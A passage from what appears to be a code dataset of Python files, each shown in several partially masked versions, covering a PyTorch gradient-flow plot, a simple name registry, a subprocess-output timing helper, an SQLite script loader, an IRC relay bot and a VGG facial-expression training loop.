graphPoints is not None:\n print(graphPoints)\n for point in graphPoints['points']:\n points_selected.append(point['customdata'][0])\n return points_selected\n\n def set_data(self, df):\n \"\"\"\n Loads in possible parameters for the x and y-axis in dropdown from the data.\n :param dummy: dummy html property\n :return: Possible options for dropdown x-axis.\n \"\"\"\n self.df = df",
"step-ids": [
1,
3,
5,
6,
7
]
}
|
[
1,
3,
5,
6,
7
] |
import torch
import torch.nn.functional as f
import time
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
import numpy as np
dtype = torch.float
device = torch.device("cpu")
# device = torch.device("cuda:0") # Uncomment this to run on GPU
N, D_in, H, D_out = 64, 1000, 100, 10
x = torch.randn(N, D_in, device=device, dtype=dtype)
y = torch.randn(N, D_out, device=device, dtype=dtype)
model = torch.nn.Sequential(
torch.nn.Linear(D_in, H),
torch.nn.ReLU(),
torch.nn.Linear(H, D_out),
)
def plot_grad_flow(named_parameters):
'''Plots the gradients flowing through different layers in the net during training.
Can be used for checking for possible gradient vanishing / exploding problems.
Usage: Plug this function in Trainer class after loss.backwards() as
"plot_grad_flow(self.model.named_parameters())" to visualize the gradient flow'''
ave_grads = []
max_grads = []
layers = []
for n, p in named_parameters:
if (p.requires_grad) and ("bias" not in n):
layers.append(n)
ave_grads.append(p.grad.abs().mean())
max_grads.append(p.grad.abs().max())
plt.bar(np.arange(len(max_grads)), max_grads, alpha=0.1, lw=1, color="c")
plt.bar(np.arange(len(max_grads)), ave_grads, alpha=0.1, lw=1, color="b")
plt.hlines(0, 0, len(ave_grads) + 1, lw=2, color="k")
plt.xticks(range(0, len(ave_grads), 1), layers, rotation="vertical")
plt.xlim(left=0, right=len(ave_grads))
plt.ylim(bottom=-0.001, top=0.02) # zoom in on the lower gradient regions
plt.xlabel("Layers")
plt.ylabel("average gradient")
plt.title("Gradient flow")
plt.grid(True)
plt.legend([Line2D([0], [0], color="c", lw=4),
Line2D([0], [0], color="b", lw=4),
Line2D([0], [0], color="k", lw=4)], ['max-gradient', 'mean-gradient', 'zero-gradient'])
plt.show()
learning_rate = 1e-6
y_pred = model(x)
loss = (y_pred - y).pow(2).sum()
loss.backward()
plot_grad_flow(model.named_parameters())
|
normal
|
{
"blob_id": "0fb424dafaac184882ea56f36265e0b19b5a4c50",
"index": 9758,
"step-1": "<mask token>\n\n\ndef plot_grad_flow(named_parameters):\n \"\"\"Plots the gradients flowing through different layers in the net during training.\n Can be used for checking for possible gradient vanishing / exploding problems.\n\n Usage: Plug this function in Trainer class after loss.backwards() as\n \"plot_grad_flow(self.model.named_parameters())\" to visualize the gradient flow\"\"\"\n ave_grads = []\n max_grads = []\n layers = []\n for n, p in named_parameters:\n if p.requires_grad and 'bias' not in n:\n layers.append(n)\n ave_grads.append(p.grad.abs().mean())\n max_grads.append(p.grad.abs().max())\n plt.bar(np.arange(len(max_grads)), max_grads, alpha=0.1, lw=1, color='c')\n plt.bar(np.arange(len(max_grads)), ave_grads, alpha=0.1, lw=1, color='b')\n plt.hlines(0, 0, len(ave_grads) + 1, lw=2, color='k')\n plt.xticks(range(0, len(ave_grads), 1), layers, rotation='vertical')\n plt.xlim(left=0, right=len(ave_grads))\n plt.ylim(bottom=-0.001, top=0.02)\n plt.xlabel('Layers')\n plt.ylabel('average gradient')\n plt.title('Gradient flow')\n plt.grid(True)\n plt.legend([Line2D([0], [0], color='c', lw=4), Line2D([0], [0], color=\n 'b', lw=4), Line2D([0], [0], color='k', lw=4)], ['max-gradient',\n 'mean-gradient', 'zero-gradient'])\n plt.show()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef plot_grad_flow(named_parameters):\n \"\"\"Plots the gradients flowing through different layers in the net during training.\n Can be used for checking for possible gradient vanishing / exploding problems.\n\n Usage: Plug this function in Trainer class after loss.backwards() as\n \"plot_grad_flow(self.model.named_parameters())\" to visualize the gradient flow\"\"\"\n ave_grads = []\n max_grads = []\n layers = []\n for n, p in named_parameters:\n if p.requires_grad and 'bias' not in n:\n layers.append(n)\n ave_grads.append(p.grad.abs().mean())\n max_grads.append(p.grad.abs().max())\n plt.bar(np.arange(len(max_grads)), max_grads, alpha=0.1, lw=1, color='c')\n plt.bar(np.arange(len(max_grads)), ave_grads, alpha=0.1, lw=1, color='b')\n plt.hlines(0, 0, len(ave_grads) + 1, lw=2, color='k')\n plt.xticks(range(0, len(ave_grads), 1), layers, rotation='vertical')\n plt.xlim(left=0, right=len(ave_grads))\n plt.ylim(bottom=-0.001, top=0.02)\n plt.xlabel('Layers')\n plt.ylabel('average gradient')\n plt.title('Gradient flow')\n plt.grid(True)\n plt.legend([Line2D([0], [0], color='c', lw=4), Line2D([0], [0], color=\n 'b', lw=4), Line2D([0], [0], color='k', lw=4)], ['max-gradient',\n 'mean-gradient', 'zero-gradient'])\n plt.show()\n\n\n<mask token>\nloss.backward()\nplot_grad_flow(model.named_parameters())\n",
"step-3": "<mask token>\ndtype = torch.float\ndevice = torch.device('cpu')\nN, D_in, H, D_out = 64, 1000, 100, 10\nx = torch.randn(N, D_in, device=device, dtype=dtype)\ny = torch.randn(N, D_out, device=device, dtype=dtype)\nmodel = torch.nn.Sequential(torch.nn.Linear(D_in, H), torch.nn.ReLU(),\n torch.nn.Linear(H, D_out))\n\n\ndef plot_grad_flow(named_parameters):\n \"\"\"Plots the gradients flowing through different layers in the net during training.\n Can be used for checking for possible gradient vanishing / exploding problems.\n\n Usage: Plug this function in Trainer class after loss.backwards() as\n \"plot_grad_flow(self.model.named_parameters())\" to visualize the gradient flow\"\"\"\n ave_grads = []\n max_grads = []\n layers = []\n for n, p in named_parameters:\n if p.requires_grad and 'bias' not in n:\n layers.append(n)\n ave_grads.append(p.grad.abs().mean())\n max_grads.append(p.grad.abs().max())\n plt.bar(np.arange(len(max_grads)), max_grads, alpha=0.1, lw=1, color='c')\n plt.bar(np.arange(len(max_grads)), ave_grads, alpha=0.1, lw=1, color='b')\n plt.hlines(0, 0, len(ave_grads) + 1, lw=2, color='k')\n plt.xticks(range(0, len(ave_grads), 1), layers, rotation='vertical')\n plt.xlim(left=0, right=len(ave_grads))\n plt.ylim(bottom=-0.001, top=0.02)\n plt.xlabel('Layers')\n plt.ylabel('average gradient')\n plt.title('Gradient flow')\n plt.grid(True)\n plt.legend([Line2D([0], [0], color='c', lw=4), Line2D([0], [0], color=\n 'b', lw=4), Line2D([0], [0], color='k', lw=4)], ['max-gradient',\n 'mean-gradient', 'zero-gradient'])\n plt.show()\n\n\nlearning_rate = 1e-06\ny_pred = model(x)\nloss = (y_pred - y).pow(2).sum()\nloss.backward()\nplot_grad_flow(model.named_parameters())\n",
"step-4": "import torch\nimport torch.nn.functional as f\nimport time\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nimport numpy as np\ndtype = torch.float\ndevice = torch.device('cpu')\nN, D_in, H, D_out = 64, 1000, 100, 10\nx = torch.randn(N, D_in, device=device, dtype=dtype)\ny = torch.randn(N, D_out, device=device, dtype=dtype)\nmodel = torch.nn.Sequential(torch.nn.Linear(D_in, H), torch.nn.ReLU(),\n torch.nn.Linear(H, D_out))\n\n\ndef plot_grad_flow(named_parameters):\n \"\"\"Plots the gradients flowing through different layers in the net during training.\n Can be used for checking for possible gradient vanishing / exploding problems.\n\n Usage: Plug this function in Trainer class after loss.backwards() as\n \"plot_grad_flow(self.model.named_parameters())\" to visualize the gradient flow\"\"\"\n ave_grads = []\n max_grads = []\n layers = []\n for n, p in named_parameters:\n if p.requires_grad and 'bias' not in n:\n layers.append(n)\n ave_grads.append(p.grad.abs().mean())\n max_grads.append(p.grad.abs().max())\n plt.bar(np.arange(len(max_grads)), max_grads, alpha=0.1, lw=1, color='c')\n plt.bar(np.arange(len(max_grads)), ave_grads, alpha=0.1, lw=1, color='b')\n plt.hlines(0, 0, len(ave_grads) + 1, lw=2, color='k')\n plt.xticks(range(0, len(ave_grads), 1), layers, rotation='vertical')\n plt.xlim(left=0, right=len(ave_grads))\n plt.ylim(bottom=-0.001, top=0.02)\n plt.xlabel('Layers')\n plt.ylabel('average gradient')\n plt.title('Gradient flow')\n plt.grid(True)\n plt.legend([Line2D([0], [0], color='c', lw=4), Line2D([0], [0], color=\n 'b', lw=4), Line2D([0], [0], color='k', lw=4)], ['max-gradient',\n 'mean-gradient', 'zero-gradient'])\n plt.show()\n\n\nlearning_rate = 1e-06\ny_pred = model(x)\nloss = (y_pred - y).pow(2).sum()\nloss.backward()\nplot_grad_flow(model.named_parameters())\n",
"step-5": "\nimport torch\nimport torch.nn.functional as f\nimport time\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nimport numpy as np\n\ndtype = torch.float\ndevice = torch.device(\"cpu\")\n# device = torch.device(\"cuda:0\") # Uncomment this to run on GPU\n\nN, D_in, H, D_out = 64, 1000, 100, 10\n\nx = torch.randn(N, D_in, device=device, dtype=dtype)\ny = torch.randn(N, D_out, device=device, dtype=dtype)\n\nmodel = torch.nn.Sequential(\n torch.nn.Linear(D_in, H),\n torch.nn.ReLU(),\n torch.nn.Linear(H, D_out),\n)\n\n\ndef plot_grad_flow(named_parameters):\n '''Plots the gradients flowing through different layers in the net during training.\n Can be used for checking for possible gradient vanishing / exploding problems.\n\n Usage: Plug this function in Trainer class after loss.backwards() as\n \"plot_grad_flow(self.model.named_parameters())\" to visualize the gradient flow'''\n ave_grads = []\n max_grads = []\n layers = []\n for n, p in named_parameters:\n if (p.requires_grad) and (\"bias\" not in n):\n layers.append(n)\n ave_grads.append(p.grad.abs().mean())\n max_grads.append(p.grad.abs().max())\n plt.bar(np.arange(len(max_grads)), max_grads, alpha=0.1, lw=1, color=\"c\")\n plt.bar(np.arange(len(max_grads)), ave_grads, alpha=0.1, lw=1, color=\"b\")\n plt.hlines(0, 0, len(ave_grads) + 1, lw=2, color=\"k\")\n plt.xticks(range(0, len(ave_grads), 1), layers, rotation=\"vertical\")\n plt.xlim(left=0, right=len(ave_grads))\n plt.ylim(bottom=-0.001, top=0.02) # zoom in on the lower gradient regions\n plt.xlabel(\"Layers\")\n plt.ylabel(\"average gradient\")\n plt.title(\"Gradient flow\")\n plt.grid(True)\n plt.legend([Line2D([0], [0], color=\"c\", lw=4),\n Line2D([0], [0], color=\"b\", lw=4),\n Line2D([0], [0], color=\"k\", lw=4)], ['max-gradient', 'mean-gradient', 'zero-gradient'])\n\n plt.show()\n\nlearning_rate = 1e-6\ny_pred = model(x)\nloss = (y_pred - y).pow(2).sum()\nloss.backward()\nplot_grad_flow(model.named_parameters())\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def registry_names():
return iter(_registry)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def registry(name):
_registry.append(name)
def registry_names():
return iter(_registry)
<|reserved_special_token_1|>
_registry = []
def registry(name):
_registry.append(name)
def registry_names():
return iter(_registry)
|
flexible
|
{
"blob_id": "51642dbb210600f9ca4e035fb884fbdda030fd04",
"index": 1491,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef registry_names():\n return iter(_registry)\n",
"step-3": "<mask token>\n\n\ndef registry(name):\n _registry.append(name)\n\n\ndef registry_names():\n return iter(_registry)\n",
"step-4": "_registry = []\n\n\ndef registry(name):\n _registry.append(name)\n\n\ndef registry_names():\n return iter(_registry)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import time
from typing import List
from classiclikeiguana.timeout import timeout
class ExecutionMetrics:
def __init__(self, duration, succeeded: bool, timed_out: bool, lines: int, error: List[str] = None):
if error is None:
error = list()
self.duration = duration
self.succeeded: bool = succeeded
self.timed_out: bool = timed_out
self.lines: int = lines
self.error: List[str] = error
def __str__(self):
return "succeeded: {succeeded} ; lines: {lines} ; duration: {duration} s ; error: {error}" \
.format(succeeded=self.succeeded, lines=self.lines, duration=self.duration, error=self.error)
def read_stdout_until(process, terminal_startswith: str, failure_startswith: List[str], timeout_time: float,
debug: bool = False):
start = time.time()
line: str = ""
lines: int = 0
duration = None
succeeded = True
timed_out = False
errors: List[str] = list()
with timeout(timeout_time):
while True:
line = process.stdout.readline()
if debug: print(line, end="")
for start_str in failure_startswith:
if line.startswith(start_str):
errors.append(line)
succeeded = False
if any(line.startswith(start_str) for start_str in terminal_startswith):
duration = time.time() - start
break
else:
lines += 1
if duration is None:
succeeded = False
timed_out = True
duration = timeout_time
return ExecutionMetrics(duration, succeeded, timed_out, lines, errors)
|
normal
|
{
"blob_id": "f870c776a62f3b743356c5515cd25e588dbfca15",
"index": 8183,
"step-1": "<mask token>\n\n\nclass ExecutionMetrics:\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ExecutionMetrics:\n\n def __init__(self, duration, succeeded: bool, timed_out: bool, lines:\n int, error: List[str]=None):\n if error is None:\n error = list()\n self.duration = duration\n self.succeeded: bool = succeeded\n self.timed_out: bool = timed_out\n self.lines: int = lines\n self.error: List[str] = error\n\n def __str__(self):\n return (\n 'succeeded: {succeeded} ; lines: {lines} ; duration: {duration} s ; error: {error}'\n .format(succeeded=self.succeeded, lines=self.lines, duration=\n self.duration, error=self.error))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ExecutionMetrics:\n\n def __init__(self, duration, succeeded: bool, timed_out: bool, lines:\n int, error: List[str]=None):\n if error is None:\n error = list()\n self.duration = duration\n self.succeeded: bool = succeeded\n self.timed_out: bool = timed_out\n self.lines: int = lines\n self.error: List[str] = error\n\n def __str__(self):\n return (\n 'succeeded: {succeeded} ; lines: {lines} ; duration: {duration} s ; error: {error}'\n .format(succeeded=self.succeeded, lines=self.lines, duration=\n self.duration, error=self.error))\n\n\ndef read_stdout_until(process, terminal_startswith: str, failure_startswith:\n List[str], timeout_time: float, debug: bool=False):\n start = time.time()\n line: str = ''\n lines: int = 0\n duration = None\n succeeded = True\n timed_out = False\n errors: List[str] = list()\n with timeout(timeout_time):\n while True:\n line = process.stdout.readline()\n if debug:\n print(line, end='')\n for start_str in failure_startswith:\n if line.startswith(start_str):\n errors.append(line)\n succeeded = False\n if any(line.startswith(start_str) for start_str in\n terminal_startswith):\n duration = time.time() - start\n break\n else:\n lines += 1\n if duration is None:\n succeeded = False\n timed_out = True\n duration = timeout_time\n return ExecutionMetrics(duration, succeeded, timed_out, lines, errors)\n",
"step-4": "import time\nfrom typing import List\nfrom classiclikeiguana.timeout import timeout\n\n\nclass ExecutionMetrics:\n\n def __init__(self, duration, succeeded: bool, timed_out: bool, lines:\n int, error: List[str]=None):\n if error is None:\n error = list()\n self.duration = duration\n self.succeeded: bool = succeeded\n self.timed_out: bool = timed_out\n self.lines: int = lines\n self.error: List[str] = error\n\n def __str__(self):\n return (\n 'succeeded: {succeeded} ; lines: {lines} ; duration: {duration} s ; error: {error}'\n .format(succeeded=self.succeeded, lines=self.lines, duration=\n self.duration, error=self.error))\n\n\ndef read_stdout_until(process, terminal_startswith: str, failure_startswith:\n List[str], timeout_time: float, debug: bool=False):\n start = time.time()\n line: str = ''\n lines: int = 0\n duration = None\n succeeded = True\n timed_out = False\n errors: List[str] = list()\n with timeout(timeout_time):\n while True:\n line = process.stdout.readline()\n if debug:\n print(line, end='')\n for start_str in failure_startswith:\n if line.startswith(start_str):\n errors.append(line)\n succeeded = False\n if any(line.startswith(start_str) for start_str in\n terminal_startswith):\n duration = time.time() - start\n break\n else:\n lines += 1\n if duration is None:\n succeeded = False\n timed_out = True\n duration = timeout_time\n return ExecutionMetrics(duration, succeeded, timed_out, lines, errors)\n",
"step-5": "import time\nfrom typing import List\n\nfrom classiclikeiguana.timeout import timeout\n\n\nclass ExecutionMetrics:\n def __init__(self, duration, succeeded: bool, timed_out: bool, lines: int, error: List[str] = None):\n if error is None:\n error = list()\n self.duration = duration\n self.succeeded: bool = succeeded\n self.timed_out: bool = timed_out\n self.lines: int = lines\n self.error: List[str] = error\n\n def __str__(self):\n return \"succeeded: {succeeded} ; lines: {lines} ; duration: {duration} s ; error: {error}\" \\\n .format(succeeded=self.succeeded, lines=self.lines, duration=self.duration, error=self.error)\n\n\ndef read_stdout_until(process, terminal_startswith: str, failure_startswith: List[str], timeout_time: float,\n debug: bool = False):\n start = time.time()\n line: str = \"\"\n lines: int = 0\n duration = None\n succeeded = True\n timed_out = False\n errors: List[str] = list()\n with timeout(timeout_time):\n while True:\n line = process.stdout.readline()\n if debug: print(line, end=\"\")\n for start_str in failure_startswith:\n if line.startswith(start_str):\n errors.append(line)\n succeeded = False\n if any(line.startswith(start_str) for start_str in terminal_startswith):\n duration = time.time() - start\n break\n else:\n lines += 1\n\n if duration is None:\n succeeded = False\n timed_out = True\n duration = timeout_time\n return ExecutionMetrics(duration, succeeded, timed_out, lines, errors)\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
import sqlite3
connection = sqlite3.connect("../db.sqlite3")
cursor = connection.cursor()
sql_file = open("sample.sql")
sql_as_string = sql_file.read()
cursor.executescript(sql_as_string)
for row in cursor.execute("SELECT * FROM results_states"):
print(row)
|
normal
|
{
"blob_id": "10a981e35ce00ee8e32a613823d3bc919fafaae8",
"index": 8225,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ncursor.executescript(sql_as_string)\nfor row in cursor.execute('SELECT * FROM results_states'):\n print(row)\n",
"step-3": "<mask token>\nconnection = sqlite3.connect('../db.sqlite3')\ncursor = connection.cursor()\nsql_file = open('sample.sql')\nsql_as_string = sql_file.read()\ncursor.executescript(sql_as_string)\nfor row in cursor.execute('SELECT * FROM results_states'):\n print(row)\n",
"step-4": "import sqlite3\nconnection = sqlite3.connect('../db.sqlite3')\ncursor = connection.cursor()\nsql_file = open('sample.sql')\nsql_as_string = sql_file.read()\ncursor.executescript(sql_as_string)\nfor row in cursor.execute('SELECT * FROM results_states'):\n print(row)\n",
"step-5": "import sqlite3\n\nconnection = sqlite3.connect(\"../db.sqlite3\")\n\ncursor = connection.cursor()\n\nsql_file = open(\"sample.sql\")\nsql_as_string = sql_file.read()\ncursor.executescript(sql_as_string)\n\nfor row in cursor.execute(\"SELECT * FROM results_states\"):\n print(row)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import datetime
import logging
import random
import transform
import timelapse
# merge two iterators producing sorted values
def merge(s1, s2):
try:
x1 = next(s1)
except StopIteration:
yield from s2
return
try:
x2 = next(s2)
except StopIteration:
yield from s1
return
while True:
if x2 > x1:
yield x1
try:
x1 = next(s1)
except StopIteration:
yield x2
yield from s2
return
else:
yield x2
try:
x2 = next(s2)
except StopIteration:
yield x1
yield from s1
return
def sliding_stream(delay_secs=20):
ts = datetime.datetime.now()
delay = datetime.timedelta(0,delay_secs)
while True:
yield(ts, random.choice(transform.all_transforms))
ts = ts + delay
class Sliders(timelapse.TimeLapse):
def __init__(self, server_list, nick="Sliders", channel="#sliders", realname="Sliders",
sliding_window = 60, **params):
super().__init__(server_list, nick=nick, channel=channel, **params)
self.lapsed = merge(self.lapsed, sliding_stream(sliding_window))
self.sliders_transform = random.choice(transform.all_transforms)
def on_lapsed_message(self, msg):
if isinstance(msg, transform.Transform):
self.sliders_transform = msg
self.connection.privmsg(self.lapsed_channel,
"\x01ACTION s'ouvre vers un monde parallèle peuplé de jumeaux "
+ msg.name + "\x01")
else:
super().on_lapsed_message(self.sliders_transform(msg))
|
normal
|
{
"blob_id": "c651d49c98a4cf457c8252c94c6785dea8e9af60",
"index": 3909,
"step-1": "<mask token>\n\n\nclass Sliders(timelapse.TimeLapse):\n\n def __init__(self, server_list, nick='Sliders', channel='#sliders',\n realname='Sliders', sliding_window=60, **params):\n super().__init__(server_list, nick=nick, channel=channel, **params)\n self.lapsed = merge(self.lapsed, sliding_stream(sliding_window))\n self.sliders_transform = random.choice(transform.all_transforms)\n\n def on_lapsed_message(self, msg):\n if isinstance(msg, transform.Transform):\n self.sliders_transform = msg\n self.connection.privmsg(self.lapsed_channel, \n \"\\x01ACTION s'ouvre vers un monde parallèle peuplé de jumeaux \"\n + msg.name + '\\x01')\n else:\n super().on_lapsed_message(self.sliders_transform(msg))\n",
"step-2": "<mask token>\n\n\ndef sliding_stream(delay_secs=20):\n ts = datetime.datetime.now()\n delay = datetime.timedelta(0, delay_secs)\n while True:\n yield ts, random.choice(transform.all_transforms)\n ts = ts + delay\n\n\nclass Sliders(timelapse.TimeLapse):\n\n def __init__(self, server_list, nick='Sliders', channel='#sliders',\n realname='Sliders', sliding_window=60, **params):\n super().__init__(server_list, nick=nick, channel=channel, **params)\n self.lapsed = merge(self.lapsed, sliding_stream(sliding_window))\n self.sliders_transform = random.choice(transform.all_transforms)\n\n def on_lapsed_message(self, msg):\n if isinstance(msg, transform.Transform):\n self.sliders_transform = msg\n self.connection.privmsg(self.lapsed_channel, \n \"\\x01ACTION s'ouvre vers un monde parallèle peuplé de jumeaux \"\n + msg.name + '\\x01')\n else:\n super().on_lapsed_message(self.sliders_transform(msg))\n",
"step-3": "<mask token>\n\n\ndef merge(s1, s2):\n try:\n x1 = next(s1)\n except StopIteration:\n yield from s2\n return\n try:\n x2 = next(s2)\n except StopIteration:\n yield from s1\n return\n while True:\n if x2 > x1:\n yield x1\n try:\n x1 = next(s1)\n except StopIteration:\n yield x2\n yield from s2\n return\n else:\n yield x2\n try:\n x2 = next(s2)\n except StopIteration:\n yield x1\n yield from s1\n return\n\n\ndef sliding_stream(delay_secs=20):\n ts = datetime.datetime.now()\n delay = datetime.timedelta(0, delay_secs)\n while True:\n yield ts, random.choice(transform.all_transforms)\n ts = ts + delay\n\n\nclass Sliders(timelapse.TimeLapse):\n\n def __init__(self, server_list, nick='Sliders', channel='#sliders',\n realname='Sliders', sliding_window=60, **params):\n super().__init__(server_list, nick=nick, channel=channel, **params)\n self.lapsed = merge(self.lapsed, sliding_stream(sliding_window))\n self.sliders_transform = random.choice(transform.all_transforms)\n\n def on_lapsed_message(self, msg):\n if isinstance(msg, transform.Transform):\n self.sliders_transform = msg\n self.connection.privmsg(self.lapsed_channel, \n \"\\x01ACTION s'ouvre vers un monde parallèle peuplé de jumeaux \"\n + msg.name + '\\x01')\n else:\n super().on_lapsed_message(self.sliders_transform(msg))\n",
"step-4": "import datetime\nimport logging\nimport random\nimport transform\nimport timelapse\n\n\ndef merge(s1, s2):\n try:\n x1 = next(s1)\n except StopIteration:\n yield from s2\n return\n try:\n x2 = next(s2)\n except StopIteration:\n yield from s1\n return\n while True:\n if x2 > x1:\n yield x1\n try:\n x1 = next(s1)\n except StopIteration:\n yield x2\n yield from s2\n return\n else:\n yield x2\n try:\n x2 = next(s2)\n except StopIteration:\n yield x1\n yield from s1\n return\n\n\ndef sliding_stream(delay_secs=20):\n ts = datetime.datetime.now()\n delay = datetime.timedelta(0, delay_secs)\n while True:\n yield ts, random.choice(transform.all_transforms)\n ts = ts + delay\n\n\nclass Sliders(timelapse.TimeLapse):\n\n def __init__(self, server_list, nick='Sliders', channel='#sliders',\n realname='Sliders', sliding_window=60, **params):\n super().__init__(server_list, nick=nick, channel=channel, **params)\n self.lapsed = merge(self.lapsed, sliding_stream(sliding_window))\n self.sliders_transform = random.choice(transform.all_transforms)\n\n def on_lapsed_message(self, msg):\n if isinstance(msg, transform.Transform):\n self.sliders_transform = msg\n self.connection.privmsg(self.lapsed_channel, \n \"\\x01ACTION s'ouvre vers un monde parallèle peuplé de jumeaux \"\n + msg.name + '\\x01')\n else:\n super().on_lapsed_message(self.sliders_transform(msg))\n",
"step-5": "import datetime\nimport logging\nimport random\nimport transform\nimport timelapse\n\n# merge two iterators producing sorted values\ndef merge(s1, s2):\n try:\n x1 = next(s1)\n except StopIteration:\n yield from s2\n return\n\n try:\n x2 = next(s2)\n except StopIteration:\n yield from s1\n return\n\n while True:\n if x2 > x1:\n yield x1\n try:\n x1 = next(s1)\n except StopIteration:\n yield x2\n yield from s2\n return\n else:\n yield x2\n try:\n x2 = next(s2)\n except StopIteration:\n yield x1\n yield from s1\n return\n \n\ndef sliding_stream(delay_secs=20):\n ts = datetime.datetime.now()\n delay = datetime.timedelta(0,delay_secs)\n while True:\n yield(ts, random.choice(transform.all_transforms))\n ts = ts + delay\n\nclass Sliders(timelapse.TimeLapse):\n def __init__(self, server_list, nick=\"Sliders\", channel=\"#sliders\", realname=\"Sliders\",\n sliding_window = 60, **params):\n super().__init__(server_list, nick=nick, channel=channel, **params)\n self.lapsed = merge(self.lapsed, sliding_stream(sliding_window))\n self.sliders_transform = random.choice(transform.all_transforms)\n\n def on_lapsed_message(self, msg):\n\n if isinstance(msg, transform.Transform):\n self.sliders_transform = msg\n self.connection.privmsg(self.lapsed_channel,\n \"\\x01ACTION s'ouvre vers un monde parallèle peuplé de jumeaux \"\n + msg.name + \"\\x01\")\n else:\n super().on_lapsed_message(self.sliders_transform(msg))\n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
model.to(device)
<|reserved_special_token_0|>
...
for epoch in range(epochs):
running_loss = 0
running_acc = 0
train_loss = 0
model.train()
for image, label in tqdm(train_dataloader, desc='Epoch [%d/%d]' % (
epoch + 1, epochs)):
optimizer.zero_grad()
image = image / 255.0
pred = model(image.float().transpose(3, 2).transpose(2, 1).to(device))
loss = criterion(pred, label.to(device))
loss.backward()
optimizer.step()
Softmax = torch.nn.Softmax(dim=1)
_, prediction_tr = torch.max(Softmax(pred), 1)
y_true_tr = label.cpu().detach().numpy()
y_pred_tr = prediction_tr.cpu().detach().numpy()
acc_tr = (label == prediction_tr.cpu()).sum().item() / pred.shape[0
] * 100
running_loss += loss * image.size(0)
running_acc += acc_tr * image.size(0)
train_loss = running_loss / len(train_dataset)
train_acc = running_acc / len(train_dataset)
print('>>> Train loss : %.4f - Train acc : %.4f' % (train_loss, train_acc))
running_loss = 0
running_acc = 0
model.eval()
with torch.no_grad():
for image, label in valid_dataloader:
image = image / 255.0
pred = model(image.float().transpose(3, 2).transpose(1, 2).to(
device))
loss = criterion(pred, label.to(device))
Softmax = torch.nn.Softmax(dim=1)
_, prediction = torch.max(Softmax(pred), 1)
y_true = label.cpu().detach().numpy()
y_pred = prediction.cpu().detach().numpy()
acc_tr = (label == prediction.cpu()).sum().item() / pred.shape[0
] * 100
running_loss += loss.item() * image.size(0)
running_acc += acc_tr * image.size(0)
valid_loss = running_loss / len(valid_dataset)
valid_acc = running_acc / len(valid_dataset)
print('>>> Valid loss : %.4f - Valid acc : %.4f\n' % (valid_loss,
valid_acc))
print(prediction)
print(label)
print()
if (epoch + 1) % 5 == 0:
save_path = os.path.join('.', 'save_')
if not os.path.exists(save_path):
os.makedirs(save_path)
torch.save(model, os.path.join(save_path,
'model_epoch%04d_loss_%.4f_acc_%.4f.ckpt' % (epoch, valid_loss,
valid_acc)))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
lr = 1e-05
epochs = 500
batch_size = 2
train_data_path = '../../../data/face_data'
train_dataset = FER(train_data_path, image_size=64, mode='train')
train_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle
=True)
valid_data_path = '../../../data/face_data'
valid_dataset = FER(valid_data_path, image_size=64, mode='val')
valid_dataloader = DataLoader(valid_dataset, batch_size=batch_size, shuffle
=False)
model = md.vgg16_bn(num_classes=3).to(device)
model.to(device)
criterion = torch.nn.CrossEntropyLoss().to(device)
optimizer = torch.optim.Adam(params=model.parameters(), lr=lr)
...
for epoch in range(epochs):
running_loss = 0
running_acc = 0
train_loss = 0
model.train()
for image, label in tqdm(train_dataloader, desc='Epoch [%d/%d]' % (
epoch + 1, epochs)):
optimizer.zero_grad()
image = image / 255.0
pred = model(image.float().transpose(3, 2).transpose(2, 1).to(device))
loss = criterion(pred, label.to(device))
loss.backward()
optimizer.step()
Softmax = torch.nn.Softmax(dim=1)
_, prediction_tr = torch.max(Softmax(pred), 1)
y_true_tr = label.cpu().detach().numpy()
y_pred_tr = prediction_tr.cpu().detach().numpy()
acc_tr = (label == prediction_tr.cpu()).sum().item() / pred.shape[0
] * 100
running_loss += loss * image.size(0)
running_acc += acc_tr * image.size(0)
train_loss = running_loss / len(train_dataset)
train_acc = running_acc / len(train_dataset)
print('>>> Train loss : %.4f - Train acc : %.4f' % (train_loss, train_acc))
running_loss = 0
running_acc = 0
model.eval()
with torch.no_grad():
for image, label in valid_dataloader:
image = image / 255.0
pred = model(image.float().transpose(3, 2).transpose(1, 2).to(
device))
loss = criterion(pred, label.to(device))
Softmax = torch.nn.Softmax(dim=1)
_, prediction = torch.max(Softmax(pred), 1)
y_true = label.cpu().detach().numpy()
y_pred = prediction.cpu().detach().numpy()
acc_tr = (label == prediction.cpu()).sum().item() / pred.shape[0
] * 100
running_loss += loss.item() * image.size(0)
running_acc += acc_tr * image.size(0)
valid_loss = running_loss / len(valid_dataset)
valid_acc = running_acc / len(valid_dataset)
print('>>> Valid loss : %.4f - Valid acc : %.4f\n' % (valid_loss,
valid_acc))
print(prediction)
print(label)
print()
if (epoch + 1) % 5 == 0:
save_path = os.path.join('.', 'save_')
if not os.path.exists(save_path):
os.makedirs(save_path)
torch.save(model, os.path.join(save_path,
'model_epoch%04d_loss_%.4f_acc_%.4f.ckpt' % (epoch, valid_loss,
valid_acc)))
<|reserved_special_token_1|>
import os
import torch
from data_loader import FER
from torch.utils.data import DataLoader
from tqdm import tqdm
import model as md
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
lr = 1e-05
epochs = 500
batch_size = 2
train_data_path = '../../../data/face_data'
